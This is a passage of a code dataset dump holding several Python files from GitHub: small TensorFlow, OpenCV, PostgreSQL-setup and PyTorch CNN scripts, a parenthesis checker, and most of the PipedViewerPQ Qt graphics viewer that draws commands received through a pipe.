10)\n\nprint(model.evaluate(test_images, test_labels))\n","repo_name":"tanmay2298/Tensorflow-Specialization","sub_path":"Intro/convolutions.py","file_name":"convolutions.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"86352314788","text":"import numpy as np\nimport cv2\n\ncaptureDevice = cv2.VideoCapture(0) # captureDevice = camera\n\nwhile True:\n ret, frame = captureDevice.read()\n\n cv2.imshow('my frame', frame)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\ncaptureDevice.release()\ncv2.destroyAllWindows()\n","repo_name":"Team1559/Vision-2022","sub_path":"Vision2022/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"1477619996","text":"import psycopg2\nimport os\nfrom app.api.v2.models.db_model import Database\nfrom instance.config import app_config\nenv = os.getenv('FLASK_ENV')\nurl = app_config[env].DATABASE_URL\n\n\ndef db_connection():\n \"\"\"Create Database Connection\"\"\"\n\n connection = psycopg2.connect(url)\n return connection\n\n\ndef create_tables():\n \"\"\"Creates the Tables\"\"\"\n\n connection = db_connection()\n cursor = connection.cursor()\n\n database = Database()\n queries = database.db_query()\n\n for sql in queries:\n cursor.execute(sql)\n connection.commit()\n\n cursor.close()\n\n\ndef create_super_admin():\n \"\"\"create a default admin\"\"\"\n try:\n connection = db_connection()\n cursor = connection.cursor()\n database = Database()\n sql = database.add_admin()\n cursor.execute(sql)\n connection.commit()\n cursor.close()\n except:\n return 'user exists'\n","repo_name":"Benkimeric/iReporter-API","sub_path":"db_config.py","file_name":"db_config.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} 
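The db_config record above selects a DATABASE_URL from app_config via the FLASK_ENV environment variable and replays the Database model's SQL over a single psycopg2 connection. Below is a minimal sketch of how such a module would typically be driven at startup; the function names (db_connection, create_tables, create_super_admin) come from the record itself, while the importable module name and the 'development' environment value are assumptions, not part of the original repository.

# Hypothetical bootstrap for the db_config module shown above.
# Assumes FLASK_ENV is set (and app_config knows it) before import;
# 'development' is an assumed environment name.
import os

os.environ.setdefault('FLASK_ENV', 'development')

import db_config  # the module from the record above (assumed importable)

db_config.create_tables()       # runs every statement from Database().db_query()
db_config.create_super_admin()  # inserts the default admin; returns 'user exists' on duplicates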
+{"seq_id":"23175165550","text":"import sys\nimport time\nimport re\n\ndef validate_parenthesis(str):\n \n if len(str) > 10000:\n exit(1)\n \n number_of_parenthesis = 0 # Critério de corretude\n parenthesis = re.sub('\\w|[+|\\-|*|/]','',str) # Limpeza na string\n \n for char in parenthesis: # Checa os caractéres na string\n if char == '(': # Para '(' o critério aumenta\n number_of_parenthesis += 1 # Para ')' o critério diminui\n elif char == ')':\n number_of_parenthesis -= 1\n if number_of_parenthesis < 0: # Situação onde se fecha um \n return False # parentêses sem antes abri-lô\n \n if number_of_parenthesis != 0: # Se ao final, o critério for diferente\n return False # de 0, a expressão está incorreta.\n return True\n\ni = 0\nstart_time = time.time()\ninput_file = open('input.txt', 'r')\noutput_file = open('output.txt', 'w')\n\nfor expression in input_file.readlines():\n if i >= 10000:\n break\n if validate_parenthesis(expression):\n output_file.write(\"correct\\n\")\n i += 1\n else:\n output_file.write(\"incorrect\\n\")\n i += 1\n\nprint(\"--- %s seconds ---\" % (time.time() - start_time))","repo_name":"qedrohenrique/exercises","sub_path":"Others/Intereview 1/programa.py","file_name":"programa.py","file_ext":"py","file_size_in_byte":1299,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18194068170","text":"#CNN model\nimport torch\nfrom torch import nn\nfrom layers import *\n\n\nclass Net(nn.Module):\n def __init__(self):\n super(Net, self).__init__()\n\n self.maxpool = nn.MaxPool2d(kernel_size=(1,3), stride=(1,3), return_indices=False)\n\n self.conv1= nn.Sequential(\n nn.Conv2d(1, 50, kernel_size=(5,25), stride=1),\n nn.BatchNorm2d(50),\n nn.ELU(inplace=True))\n #nn.ReLU(inplace=True)\n self.conv2 = nn.Sequential(\n nn.Conv2d(50, 50, kernel_size=(3,5), stride=1),\n nn.BatchNorm2d(50),\n nn.ELU(inplace=True))\n # nn.ReLU(inplace=True)\n self.conv3=nn.Sequential(\n nn.Conv2d(50, 1000, kernel_size=(1,24)), #kernel_size !!!!! conv_mode,padding=0 by default\n #nn.ReLU(inplace=True),\n nn.ELU(inplace=True),\n nn.Dropout3d(p=0.5, inplace=False))\n self.conv4 = nn.Sequential(\n nn.Conv2d(1000, 500, kernel_size=1), # kernel_size !!!!! conv_mode,padding=0 by default\n nn.ELU(inplace=True),\n #nn.ReLU(inplace=True),\n nn.Dropout3d(p=0.5, inplace=False))\n self.conv5=nn.Sequential(\n nn.Conv2d(500, 88, kernel_size=1))#,\n #nn.Sigmoid())\n\n def forward(self, x):\n # (8L, 1L, 38L, 252L)\n x = self.conv1(x)#(8L, 50L, 34L, 228L)\n x = self.maxpool(x)#(8L, 50L, 34L, 76L)\n x = self.conv2(x) #(8L, 50L, 32L, 72L)\n x = self.maxpool(x)#(8L, 50L, 32L, 24L)\n x = self.conv3(x)# (8L, 1000L, 32L, 1L)\n x = self.conv4(x)#(8L, 500L, 32L, 1L)\n x = self.conv5(x)#(8L, 88L, 32L, 1L)\n #print x.shape\n return x\n\n\ndef get_model():\n net = Net()\n loss = Loss()\n return net, loss\n","repo_name":"Socierducode/DL_AMT_CNN","sub_path":"conv.py","file_name":"conv.py","file_ext":"py","file_size_in_byte":1752,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"36383011664","text":"'''\nPipedViewerPQ is a graphics viewer application written in PyQt\nthat receives its drawing and other commands primarily from another\napplication through a pipe. A limited number of commands are\nprovided by the viewer itself to allow saving and some manipulation\nof the displayed image. 
The controlling application, however, may\nbe unaware of these modifications made to the image.\n\nPipedViewerPQProcess is used to create and run a PipedViewerPQ.\n\nThis package was developed by the Thermal Modeling and Analysis\nProject (TMAP) of the National Oceanographic and Atmospheric\nAdministration's (NOAA) Pacific Marine Environmental Lab (PMEL).\n'''\n\nfrom __future__ import print_function\n\nimport sys\nimport os\nimport signal\nimport time\nimport math\n\n# First try to import PySide2, then try PyQt5 if that fails, and finally try PyQt4 if that fails\ntry:\n import PySide2\n PYTHONQT_VERSION = 'PySide2'\nexcept ImportError:\n try:\n import PyQt5\n PYTHONQT_VERSION = 'PyQt5'\n except ImportError:\n import PyQt4\n PYTHONQT_VERSION = 'PyQt4'\n\n# Now that the Python Qt version is determined, import the parts\n# allowing any import errors to propagate out\nif PYTHONQT_VERSION == 'PySide2':\n from PySide2.QtCore import Qt, QPointF, QRect, QRectF, QSize, QSizeF, QTimer\n from PySide2.QtGui import QBrush, QColor, QFontMetricsF, QImage, QPainter, \\\n QPalette, QPen, QPicture, QPixmap, QPolygonF, \\\n QTextDocument\n from PySide2.QtWidgets import QAction, QApplication, QDialog, QFileDialog, QLabel, \\\n QMainWindow, QMessageBox, QPushButton, QScrollArea\n from PySide2.QtSvg import QSvgGenerator\n from PySide2.QtPrintSupport import QPrinter\nelif PYTHONQT_VERSION == 'PyQt5':\n from PyQt5.QtCore import Qt, QPointF, QRect, QRectF, QSize, QSizeF, QTimer\n from PyQt5.QtGui import QBrush, QColor, QFontMetricsF, QImage, QPainter, \\\n QPalette, QPen, QPicture, QPixmap, QPolygonF, \\\n QTextDocument\n from PyQt5.QtWidgets import QAction, QApplication, QDialog, QFileDialog, QLabel, \\\n QMainWindow, QMessageBox, QPushButton, QScrollArea\n from PyQt5.QtSvg import QSvgGenerator\n from PyQt5.QtPrintSupport import QPrinter\nelse:\n from PyQt4.QtCore import Qt, QPointF, QRect, QRectF, QSize, QSizeF, QTimer, QString\n from PyQt4.QtGui import QAction, QApplication, QBrush, QColor, QDialog, \\\n QFileDialog, QFontMetricsF, QImage, QLabel, \\\n QMainWindow, QMessageBox, QPainter, QPalette, \\\n QPen, QPicture, QPixmap, QPolygonF, QPrinter, \\\n QPushButton, QScrollArea, QTextDocument\n from PyQt4.QtSvg import QSvgGenerator\n\nfrom multiprocessing import Pipe, Process\n\nfrom pipedviewer import WINDOW_CLOSED_MESSAGE\nfrom pipedviewer.cmndhelperpq import CmndHelperPQ\nfrom pipedviewer.scaledialogpq import ScaleDialogPQ\n\n\nclass PipedViewerPQ(QMainWindow):\n '''\n A PyQt graphics viewer that receives generic drawing commands\n through a pipe. Uses a list of QPictures to record the drawings\n which are then used to display, manipulate, and save the image.\n\n A drawing command is a dictionary with string keys that will be\n interpreted into the appropriate PyQt command(s). 
For example,\n { \"action\":\"drawText\",\n \"text\":\"Hello\",\n \"font\":{\"family\":\"Times\", \"size\":100, \"italic\":True},\n \"fill\":{\"color\":0x880000, \"style\":\"cross\"},\n \"outline\":{\"color\":\"black\"},\n \"location\":(250,350) }\n\n The command { \"action\":\"exit\" } will shutdown the viewer.\n '''\n\n def __init__(self, cmndpipe, rspdpipe):\n '''\n Create a PyQt viewer which reads commands from the Pipe\n cmndpipe and writes responses back to rspdpipe.\n '''\n super(PipedViewerPQ, self).__init__()\n self.__cmndpipe = cmndpipe\n self.__rspdpipe = rspdpipe\n # ignore Ctrl-C\n signal.signal(signal.SIGINT, signal.SIG_IGN)\n # default scene size\n self.__scenewidth = int(10.8 * self.physicalDpiX())\n self.__sceneheight = int(8.8 * self.physicalDpiY())\n # scaling factor for line widths and symbol sizes\n self.__widthfactor = None\n self.setWidthScalingFactor(0.72)\n # by default pay attention to any alpha channel values in colors\n self.__noalpha = False\n # initial default color for the background (opaque white)\n self.__lastclearcolor = QColor(0xFFFFFF)\n self.__lastclearcolor.setAlpha(0xFF)\n # List of QPictures creating the current scene\n self.__viewpics = [ ]\n self.__segid = None\n # QPicture/QPainter pair for the current view\n self.__activepicture = None\n self.__activepainter = None\n # Antialias when drawing?\n self.__antialias = True\n # data for recreating the current view\n self.__fracsides = None\n self.__clipit = True\n # number of drawing commands in the active painter\n self.__drawcount = 0\n # Limit the number of drawing commands per picture\n # to avoid the appearance of being \"stuck\"\n self.__maxdraws = 1024\n # scaling factor for creating the displayed scene\n self.__scalefactor = 1.0\n # automatically adjust the scaling factor to fit the window frame?\n self.__autoscale = True\n # values used to decide if the scene needs to be updated\n self.__lastpicdrawn = 0\n self.__createpixmap = True\n self.__clearpixmap = True\n # Calculations of modified rectangular regions in QPictures\n # currently do not account for width and height of QPictures\n # played inside them. 
So keep a expansion value.\n self.__maxsymbolwidth = 0.0\n self.__maxsymbolheight = 0.0\n # create the label, that will serve as the canvas, in a scrolled area\n self.__scrollarea = QScrollArea(self)\n self.__label = QLabel(self.__scrollarea)\n # set the initial label size and other values for the scrolled area\n self.__label.setMinimumSize(self.__scenewidth, self.__sceneheight)\n self.__label.resize(self.__scenewidth, self.__sceneheight)\n # setup the scrolled area\n self.__scrollarea.setWidget(self.__label)\n self.__scrollarea.setBackgroundRole(QPalette.Dark)\n self.setCentralWidget(self.__scrollarea)\n self.__minsize = 128\n # default file name and format for saving the image\n self.__lastfilename = \"ferret.png\"\n self.__lastformat = \"png\"\n self.__addedannomargin = 12\n # command helper object\n self.__helper = CmndHelperPQ(self)\n # Create the menubar\n self.__scaleact = QAction(self.tr(\"&Scale\"), self,\n shortcut=self.tr(\"Ctrl+S\"),\n statusTip=self.tr(\"Scale the image (canvas and image change size)\"),\n triggered=self.inquireSceneScale)\n self.__saveact = QAction(self.tr(\"Save &As...\"), self,\n shortcut=self.tr(\"Ctrl+A\"),\n statusTip=self.tr(\"Save the image to file\"),\n triggered=self.inquireSaveFilename)\n self.__redrawact = QAction(self.tr(\"&Redraw\"), self,\n shortcut=self.tr(\"Ctrl+R\"),\n statusTip=self.tr(\"Clear and redraw the image\"),\n triggered=self.redrawScene)\n self.__aboutact = QAction(self.tr(\"&About\"), self,\n statusTip=self.tr(\"Show information about this viewer\"),\n triggered=self.aboutMsg)\n self.__aboutqtact = QAction(self.tr(\"About &Qt\"), self,\n statusTip=self.tr(\"Show information about the Qt library\"),\n triggered=self.aboutQtMsg)\n self.createMenus()\n # Set the initial size of the viewer\n self.__framedelta = 4\n mwwidth = self.__scenewidth + self.__framedelta\n mwheight = self.__sceneheight + self.__framedelta \\\n + self.menuBar().height() \\\n + self.statusBar().height()\n self.resize(mwwidth, mwheight)\n # check the command queue any time there are no window events to deal with\n self.__timer = QTimer(self)\n self.__timer.timeout.connect(self.checkCommandPipe)\n self.__timer.setInterval(0)\n self.__timer.start()\n # initialize the parameters for watermark image display\n self.__wmarkFilename = None\n self.__xloc = None\n self.__yloc = None\n self.__scalefrac = None\n self.__opacity = None\n self.__wmkdrawn = False\n\n def createMenus(self):\n '''\n Create the menu items for the viewer\n using the previously created actions.\n '''\n menuBar = self.menuBar()\n sceneMenu = menuBar.addMenu(menuBar.tr(\"&Image\"))\n sceneMenu.addAction(self.__scaleact)\n sceneMenu.addAction(self.__saveact)\n sceneMenu.addAction(self.__redrawact)\n helpMenu = menuBar.addMenu(menuBar.tr(\"&Help\"))\n helpMenu.addAction(self.__aboutact)\n helpMenu.addAction(self.__aboutqtact)\n\n def showEvent(self, event):\n '''\n When the viewer is going to be shown, make sure all\n the current pictures are displayed in the scene.\n '''\n # update, ignoring the visibility flags\n self.drawLastPictures(True)\n event.accept()\n\n def resizeEvent(self, event):\n '''\n Monitor resizing in case auto-scaling of the image is selected.\n '''\n if self.__autoscale:\n if self.autoScaleScene():\n # continue with the window resize\n event.accept()\n else:\n # another resize coming in, so ignore this one\n event.ignore()\n else:\n # continue with the window resize\n event.accept()\n\n def closeEvent(self, event):\n '''\n Clean up and send the WINDOW_CLOSED_MESSAGE on the response 
pipe\n before closing the window.\n '''\n self.__timer.stop()\n self.__cmndpipe.close()\n try:\n try:\n self.__rspdpipe.send(WINDOW_CLOSED_MESSAGE)\n finally:\n self.__rspdpipe.close()\n except Exception:\n pass\n event.accept()\n\n def exitViewer(self):\n '''\n Close and exit the viewer.\n '''\n self.close()\n\n def aboutMsg(self):\n QMessageBox.about(self, self.tr(\"About PipedViewerPQ\"),\n self.tr(\"\\n\" \\\n \"PipedViewerPQ is a graphics viewer application that receives its \" \\\n \"drawing and other commands primarily from another application \" \\\n \"through a pipe. A limited number of commands are provided by \" \\\n \"the viewer itself to allow saving and some manipulation of the \" \\\n \"displayed image. The controlling application, however, may be \" \\\n \"unaware of these modifications made to the image. \" \\\n \"\\n\\n\" \\\n \"PipedViewerPQ was developed by the Thermal Modeling and Analysis \" \\\n \"Project (TMAP) of the National Oceanographic and Atmospheric \" \\\n \"Administration's (NOAA) Pacific Marine Environmental Lab (PMEL). \"))\n\n def aboutQtMsg(self):\n QMessageBox.aboutQt(self, self.tr(\"About Qt\"))\n\n def ignoreAlpha(self):\n '''\n Return whether the alpha channel in colors should always be ignored.\n '''\n return self.__noalpha\n\n def paintScene(self, painter, first, leftx, uppery, scalefactor,\n statusmsg, returnregion):\n '''\n Draws the pictures self.__viewpics[first:] using the QPainter\n painter. This QPainter should have been initialized\n appropriately for the QPaintDevice to which it is painting\n (e.g., QImage.fill with the desired background color).\n\n The point (leftx, uppery) is the offset of the origin after\n scaling using scalefactor. (All are floating point values.)\n\n The status bar will be updated with a message derived from\n statusmsg before drawing each picture. Upon completion, the\n status bar will be cleared.\n\n If returnregion is True, a list of QRect objects describing\n the modified regions will be computed and returned. 
If\n returnregion is False, the modified region will not be computed\n and an empty list will be returned.\n\n The call to painter.end() will need to be made after calling\n this function.\n '''\n # change the cursor to warn the user this may take some time\n QApplication.setOverrideCursor(Qt.WaitCursor)\n # create the incomplete status message\n if (first + 1) < len(self.__viewpics):\n mymsg = \"%s (piece %%s of %s)\" % (statusmsg, str(len(self.__viewpics)))\n else:\n mymsg = \"%s (piece %%s)\" % statusmsg\n # get the origin for drawing the pictures after scaling\n myorigin = QPointF(leftx, uppery)\n # set the scaling factor for the pictures\n painter.scale(scalefactor, scalefactor)\n modrects = [ ]\n # draw the appropriate pictures\n k = first\n for (viewpic, _) in self.__viewpics[first:]:\n k += 1\n # show the progress message\n self.statusBar().showMessage( self.tr(mymsg % str(k)) )\n # draw the picture\n painter.drawPicture(myorigin, viewpic)\n if returnregion:\n picrect = viewpic.boundingRect()\n if picrect.isValid():\n # Expand the region to account for possible symbols\n xval = picrect.x() - 0.5 * self.__maxsymbolwidth\n yval = picrect.y() - 0.5 * self.__maxsymbolheight\n width = picrect.width() + self.__maxsymbolwidth\n height = picrect.height() + self.__maxsymbolheight\n # Scale and translate the region, then convert to integer\n xval = int( math.floor(xval * scalefactor + leftx) )\n width = int( math.ceil(width * scalefactor) )\n yval = int( math.floor(yval * scalefactor + uppery) )\n height = int( math.ceil(height * scalefactor) )\n # Add this rectangle to the list\n modrects.append( QRect(xval, yval, width, height) )\n # done - clear the status message\n self.statusBar().clearMessage()\n # restore the cursor back to normal\n QApplication.restoreOverrideCursor()\n if (self.__wmarkFilename is not None) and not self.__wmkdrawn:\n # painter = QPainter(self.__label.pixmap())\n # Initialize watermark objects\n wmkpic = QPixmap(self.__wmarkFilename)\n wmkpt = QPointF()\n wmkpt.setX(self.__xloc)\n wmkpt.setY(self.__yloc)\n # set watermark image display opacity\n painter.setOpacity(self.__opacity)\n # set image scale\n painter.scale(self.__scalefrac, self.__scalefrac)\n # paint watermark image at specified location\n painter.setRenderHint(QPainter.Antialiasing)\n painter.drawPixmap(wmkpt, wmkpic)\n # painter.end()\n self.__wmkdrawn = True\n return modrects\n\n def drawLastPictures(self, ignorevis):\n '''\n Update the scene with pictures yet to be drawn.\n If ignorevis is True, the update will be done\n even if the viewer is not visible; otherwise\n drawing to the scene label is only done if the\n viewer is visible.\n '''\n if not ignorevis:\n if self.isMinimized() or not self.isVisible():\n # Not shown, so do not waste time drawing\n return\n if self.__createpixmap:\n # Create and assign a cleared pixmap\n mypixmap = QPixmap(self.__label.size())\n mypixmap.fill(self.__lastclearcolor)\n self.__label.setPixmap(mypixmap)\n self.__createpixmap = False\n self.__clearpixmap = False\n wascleared = True\n elif self.__clearpixmap:\n # Clear the existing pixmap\n self.__label.pixmap().fill(self.__lastclearcolor)\n self.__clearpixmap = False\n wascleared = True\n elif len(self.__viewpics) > self.__lastpicdrawn:\n # New pictures to add to an existing scene\n # wascleared = False\n # Rectangles of modified regins incorrect for drawText\n # so always update the entire scene\n wascleared = True\n else:\n # Nothing changed so just return\n return\n # Only create the QPainter if there are pictures\n # 
to draw (this is more than just a clear)\n if len(self.__viewpics) > self.__lastpicdrawn:\n painter = QPainter(self.__label.pixmap())\n modrects = self.paintScene(painter, self.__lastpicdrawn, \\\n 0.0, 0.0, self.__scalefactor, \\\n \"Drawing\", not wascleared)\n painter.end()\n # if a watermark is specified, paintScene draws it after the other pictures\n # Notify the label of changes to the scene\n if wascleared:\n # the entire scene changed\n self.__label.update()\n else:\n # the scene changed only in the modrects areas\n for rect in modrects:\n self.__label.update(rect)\n # Update the record of which pictures have been displayed\n self.__lastpicdrawn = len(self.__viewpics)\n\n def clearScene(self, bkgcolor):\n '''\n Removes all view pictures, and fills the scene with bkgcolor.\n If bkgcolor is None or an invalid color, the color used is\n the one used from the last clearScene or redrawScene call\n with a valid color (or opaque white if a color has never\n been specified).\n '''\n # If there is an active View with content,\n # end it now, but do not update the scene\n if self.__activepainter and (self.__drawcount > 0):\n self.endView(False)\n restartview = True\n else:\n restartview = False\n # get the color to use for clearing (the background color)\n if bkgcolor:\n if bkgcolor.isValid():\n self.__lastclearcolor = bkgcolor\n # Delete all the pictures from the list and\n # mark that the pixmap needs to be cleared\n self.__viewpics[:] = [ ]\n self.__maxsymbolwidth = 0.0\n self.__maxsymbolheight = 0.0\n self.__clearpixmap = True\n self.__lastpicdrawn = 0\n # Update the scene label if visible\n self.drawLastPictures(False)\n # If there was a non-empty active View, restart it\n if restartview:\n self.beginViewFromSides(self.__fracsides, self.__clipit)\n\n def redrawScene(self, bkgcolor=None):\n '''\n Clear the scene using the given background color and redraw all\n the pictures to the displayed scene. 
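The equivalent command arriving on the pipe, as dispatched by\n processCommand, is a dictionary such as (color value illustrative):\n { \"action\":\"redraw\", \"color\":\"white\" }\n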
If bkgcolor is None or an\n invalid color, the color used is the one used from the last\n clearScene or redrawScene call with a valid color (or opaque\n white if a color has never been specified).\n '''\n # If there is an active View, end it now, but do not update the scene\n if self.__activepainter:\n self.endView(False)\n hadactiveview = True\n else:\n hadactiveview = False\n if bkgcolor:\n if bkgcolor.isValid():\n self.__lastclearcolor = bkgcolor\n # mark that the pixmap needs to be cleared\n # and all the pictures redrawn\n self.__clearpixmap = True\n self.__lastpicdrawn = 0\n # Update the scene label if visible\n self.drawLastPictures(False)\n # If there was an active View, restart it in this new system\n if hadactiveview:\n self.beginViewFromSides(self.__fracsides, self.__clipit)\n\n def resizeScene(self, width, height):\n '''\n Resize the scene to the given width and height in units of pixels.\n '''\n newwidth = int(width + 0.5)\n if newwidth < self.__minsize:\n newwidth = self.__minsize\n newheight = int(height + 0.5)\n if newheight < self.__minsize:\n newheight = self.__minsize\n if (newwidth != self.__scenewidth) or (newheight != self.__sceneheight):\n # Resize the label and set label values\n # so the scrollarea knows of the new size\n labelwidth = int(newwidth * self.__scalefactor + 0.5)\n labelheight = int(newheight * self.__scalefactor + 0.5)\n self.__label.setMinimumSize(labelwidth, labelheight)\n self.__label.resize(labelwidth, labelheight)\n # mark that the pixmap needs to be recreated\n self.__scenewidth = newwidth\n self.__sceneheight = newheight\n self.__createpixmap = True\n # If auto-scaling, set scaling factor to 1.0 and resize the window\n if self.__autoscale:\n self.__scalefactor = 1.0\n barheights = self.menuBar().height() + self.statusBar().height()\n self.resize(newwidth + self.__framedelta,\n newheight + self.__framedelta + barheights)\n # the resize should redraw the scene\n else:\n # Redraw the scene from the beginning using the scaling factor\n self.redrawScene()\n\n\n def inquireSceneScale(self):\n '''\n Prompt the user for the desired scaling factor for the scene.\n '''\n labelwidth = int(self.__scenewidth * self.__scalefactor + 0.5)\n labelheight = int(self.__sceneheight * self.__scalefactor + 0.5)\n scaledlg = ScaleDialogPQ(self.__scalefactor, labelwidth, labelheight,\n self.__minsize, self.__minsize, self.__autoscale, self)\n if scaledlg.exec_():\n (newscale, autoscale, okay) = scaledlg.getValues()\n if okay:\n if autoscale:\n self.__autoscale = True\n self.autoScaleScene()\n else:\n self.__autoscale = False\n self.scaleScene(newscale, False)\n\n def autoScaleScene(self):\n '''\n Selects a scaling factor that maximizes the scene within the window\n frame without requiring scroll bars. 
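The factor chosen is the smaller of the width and height ratios\n of the usable frame to the scene; for example (sizes here are\n only illustrative), a 1000 x 500 scene in a 600 x 600 usable\n frame would be scaled by min(600/1000, 600/500) = 0.6.\n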
Intended to be called when\n the window size is changed by the user and auto-scaling is turned on.\n\n Returns:\n True if scaling of this scene is done (no window resize)\n False if a new resize command was issued\n '''\n barheights = self.menuBar().height() + self.statusBar().height()\n\n # get the size for the central widget\n cwheight = self.height() - barheights - self.__framedelta\n heightsf = float(cwheight) / float(self.__sceneheight)\n\n cwwidth = self.width() - self.__framedelta\n widthsf = float(cwwidth) / float(self.__scenewidth)\n\n if heightsf < widthsf:\n factor = heightsf\n else:\n factor = widthsf\n\n newcwheight = int(factor * self.__sceneheight + 0.5)\n newcwwidth = int(factor * self.__scenewidth + 0.5)\n\n # if the window does not have the correct aspect ratio, resize it so\n # it will; this will generate another call to this method. Otherwise,\n # scale the scene and be done.\n if self.isMaximized() or \\\n ( (abs(cwheight - newcwheight) <= self.__framedelta) and \\\n (abs(cwwidth - newcwwidth) <= self.__framedelta) ):\n self.scaleScene(factor, False)\n return True\n else:\n self.resize(newcwwidth + self.__framedelta,\n newcwheight + self.__framedelta + barheights)\n return False\n\n def scaleScene(self, factor, resizewin):\n '''\n Scales both the horizontal and vertical directions by factor.\n Scaling factors are not cumulative. So if the scene was\n already scaled, that scaling is \"removed\" before this scaling\n factor is applied. If resizewin is True, the main window is\n resized to accommodate this new scaled scene size.\n\n If factor is zero, just switch to auto-scaling at the current\n window size. If factor is negative, rescale using the absolute\n value (possibly resizing the window) then switch to auto-scaling.\n '''\n fltfactor = float(factor)\n if fltfactor != 0.0:\n if resizewin:\n # from command - turn off autoscaling for the following\n # then turn back on if appropriate\n self.__autoscale = False\n newfactor = abs(fltfactor)\n newlabwidth = int(newfactor * self.__scenewidth + 0.5)\n newlabheight = int(newfactor * self.__sceneheight + 0.5)\n if (newlabwidth < self.__minsize) or (newlabheight < self.__minsize):\n # Set to minimum size\n if self.__scenewidth <= self.__sceneheight:\n newfactor = float(self.__minsize) / float(self.__scenewidth)\n else:\n newfactor = float(self.__minsize) / float(self.__sceneheight)\n newlabwidth = int(newfactor * self.__scenewidth + 0.5)\n newlabheight = int(newfactor * self.__sceneheight + 0.5)\n oldlabwidth = int(self.__scalefactor * self.__scenewidth + 0.5)\n oldlabheight = int(self.__scalefactor * self.__sceneheight + 0.5)\n if (newlabwidth != oldlabwidth) or (newlabheight != oldlabheight):\n # Set the new scaling factor\n self.__scalefactor = newfactor\n # Resize the label and set label values\n # so the scrollarea knows of the new size\n self.__label.setMinimumSize(newlabwidth, newlabheight)\n self.__label.resize(newlabwidth, newlabheight)\n # mark that the pixmap needs to be recreated\n self.__createpixmap = True\n # Redraw the scene from the beginning\n self.redrawScene()\n if resizewin:\n # resize the main window (if possible)\n barheights = self.menuBar().height() + self.statusBar().height()\n mwheight = newlabheight + barheights + self.__framedelta\n mwwidth = newlabwidth + self.__framedelta\n # Do not exceed the available real estate on the screen.\n # If autoscaling is in effect, the resize will trigger\n # any required adjustments.\n scrnrect = QApplication.desktop().availableGeometry()\n if mwwidth > 0.95 
* scrnrect.width():\n mwwidth = int(0.9 * scrnrect.width())\n if mwheight > 0.95 * scrnrect.height():\n mwheight = int(0.9 * scrnrect.height())\n self.resize(mwwidth, mwheight)\n if fltfactor <= 0.0:\n # From command - turn on autoscaling\n self.__autoscale = True\n self.autoScaleScene();\n\n def inquireSaveFilename(self):\n '''\n Prompt the user for the name of the file into which to save the scene.\n The file format will be determined from the filename extension.\n '''\n formattypes = [ ( \"png\",\n \"PNG - Portable Networks Graphics (*.png)\"),\n ( \"jpeg\",\n \"JPEG - Joint Photographic Experts Group (*.jpeg *.jpg *.jpe)\" ),\n ( \"tiff\",\n \"TIFF - Tagged Image File Format (*.tiff *.tif)\" ),\n ( \"pdf\",\n \"PDF - Portable Document Format (*.pdf)\" ),\n ( \"ps\",\n \"PS - PostScript (*.ps)\" ),\n ( \"svg\",\n \"SVG - Scalable Vector Graphics (*.svg)\" ),\n ( \"bmp\",\n \"BMP - Windows Bitmap (*.bmp)\" ),\n ( \"ppm\",\n \"PPM - Portable Pixmap (*.ppm)\" ),\n ( \"xpm\",\n \"XPM - X11 Pixmap (*.xpm)\" ),\n ( \"xbm\",\n \"XBM - X11 Bitmap (*.xbm)\" ), ]\n filters = \";;\".join( [ t[1] for t in formattypes ] )\n if PYTHONQT_VERSION == 'PyQt4':\n # tr returns QStrings in PyQt4 (Python2)\n (fileName, fileFilter) = QFileDialog.getSaveFileNameAndFilter(self,\n self.tr(\"Save the current image as \"), self.tr(self.__lastfilename), self.tr(filters))\n else:\n # tr returns Python unicode strings in PySide2 or PyQt5 (Python3)\n (fileName, fileFilter) = QFileDialog.getSaveFileName(self,\n self.tr(\"Save the current image as \"), self.tr(self.__lastfilename), self.tr(filters))\n if fileName:\n for (fmt, fmtQName) in formattypes:\n if self.tr(fmtQName) == fileFilter:\n fileFormat = fmt\n break\n else:\n raise RuntimeError(\"Unexpected file format name '%s'\" % fileFilter)\n self.saveSceneToFile(fileName, fileFormat, None, None, None, None)\n self.__lastfilename = fileName\n self.__lastformat = fileFormat\n\n def saveSceneToFile(self, filename, imageformat, transparent,\n vectsize, rastsize, myannotations):\n '''\n Save the current scene to the named file. If imageformat\n is empty or None, the format is guessed from the filename\n extension.\n\n If transparent is False, the entire scene is initialized\n to the last clearing color used, using a filled rectangle\n for vector images.\n\n If given, vectsize is the size in inches of a saved vector\n image. If vectsize is not given, a vector image will be\n saved at the current displayed scaled image size, unless\n specified otherwise if showPrintDialog is True.\n\n If given, rastsize is the pixels size of a saved raster\n image. If rastsize is not given, a raster image will be\n saved at the current displayed scaled image size.\n\n If myannotations is not None, the strings given in the tuple\n are to be displayed above the image. These annotations add\n height, as needed, to the saved image (i.e., vectsize or\n rastsize gives the height of the image below these annotations).\n '''\n # This could be called when there is no scene present.\n # If this is the case, ignore the call.\n if len(self.__viewpics) == 0:\n return\n if not imageformat:\n # Guess the image format from the filename extension\n # to determine if it is a vector type, and if so,\n # which type. 
All the raster types use a QImage, which\n # does this guessing of format when saving the image.\n fileext = ( os.path.splitext(filename)[1] ).lower()\n if fileext == '.pdf':\n # needs a PDF QPrinter\n myformat = 'pdf'\n elif fileext == '.eps':\n # needs a PS QPrinter and never rotate\n myformat = 'eps'\n elif fileext == '.ps':\n # needs a PS QPrinter\n myformat = 'ps'\n elif fileext == '.svg':\n # needs a QSvgGenerator\n myformat = 'svg'\n elif fileext == '.plt':\n # check for plt (gks metafile) - needs to be changed to pdf\n myformat = 'plt'\n elif fileext == '.gif':\n # check for gif - needs to be changed to png\n myformat = 'gif'\n else:\n # use a QImage and let it figure out the format\n myformat = None\n else:\n myformat = imageformat.lower()\n\n if myformat == 'plt':\n # Silently convert plt filename and format to pdf\n myformat = 'pdf'\n myfilename = os.path.splitext(filename)[0] + \".pdf\"\n elif myformat == 'gif':\n # Silently convert gif filename and format to png\n myformat = 'png'\n myfilename = os.path.splitext(filename)[0] + \".png\"\n else:\n myfilename = filename\n\n if 